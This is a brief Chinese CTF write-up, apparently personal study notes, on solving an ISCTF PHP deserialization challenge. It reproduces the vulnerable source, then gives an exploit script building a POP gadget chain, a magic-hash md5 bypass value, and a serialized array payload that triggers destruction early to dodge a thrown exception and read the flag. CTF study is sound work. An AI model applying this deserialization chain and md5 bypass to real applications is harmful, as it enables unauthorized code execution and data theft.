f 复现的时候gc回收机制发现不会 写出来当笔记了
学习from:https://xz.aliyun.com/t/11843?time__1311=Cq0xuD0DnD203GNem%3DQaqiI3Y5p2GbD
直接拿isctf的题目来进行练习
天命人
<?php
error_reporting(0);
\
class Wuzhishan{
public $wu="俺老孙定要踏破这五指山!<br>";
public $zhi;
public $shan;
function __get($j)
{
echo "此地阴阳二气略显虚浮,加上刚刚带入的阳气,或可借此遁逃!<br>";
$yin="s214587387a";
$yang=$_GET['J'];
if (md5($yin)==$yang&&md5($yin)==md5($yang)){
echo "哦?又一个不信天命之人?行了,拿了东西速速离开吧<br>";
system('cat /flag');
}
}
}
class Huoyanjinjing{
public $huoyan;
public $jinjing;
function __get($huo)
{
$this->huoyan="火眼能洞察一切邪祟!<br>";
echo $this->huoyan->jinjing;
}
function __invoke()
{
$this->jinjing="金睛能看破世间迷惘!<br>";
echo $this->huoyan->jinjing;
}
}
class Dinghaishenzhen{
public $Jindou="一个筋斗能翻十万八千里!<br>";
public $yun;
function __toString()
{
$f=$this->yun;
$f();
return "你真的逃出去了吗?天命人?<br>";
}
}
class Jingdouyun{
public $Qishier=72;
public $bian="看俺老孙七十二变!<br>";
function __sleep()
{
echo "三更敲门,菩提老祖送我筋斗云...<br>";
echo new Jindouyun();
}
}
class Tianmingren {
public $tianming;
public $ren;
function __destruct()
{
echo "迷途中的羔羊,你相信天命吗?<br>";
echo $this->tianming;
}
}
$data = unserialize($_POST['Wukong']);
throw new Exception('开局一根棍,装备全靠打。');
?>
|
就是gc回收机制加上反序列化
链子很简单
直接上exp了
class Wuzhishan{
public $wu;
public $zhi;
public $shan;
}
class Huoyanjinjing{
public $huoyan;
public $jinjing;
}
class Dinghaishenzhen{
public $Jindou;
public $yun;
}
class Tianmingren {
public $tianming;
public $ren;
}
$a=new Tianmingren();
$a->tianming=new Dinghaishenzhen();
$a->tianming->yun= new Huoyanjinjing();
$a->tianming->yun->huoyan= new Wuzhishan();
$b=array($a,0);
echo serialize($b);
?>
|
因为这里还存在md5的绕过 直接让J=0e215962017
最后因为还要绕过异常处理 所以我们直接反序列化一个数组 让第二个索引为0 即可绕过
payload
GET:?J=0e215962017
POST=Wukong=a:2:{i:0;O:11:"Tianmingren":2:{s:8:"tianming";O:15:"Dinghaishenzhen":2:{s:6:"Jindou";N;s:3:"yun";O:13:"Huoyanjinjing":2:{s:6:"huoyan";O:9:"Wuzhishan":3:{s:2:"wu";N;s:3:"zhi";N;s:4:"shan";N;}s:7:"jinjing";N;}}s:3:"ren";N;}i:0;i:0;}
|
.png)
.png)
.png)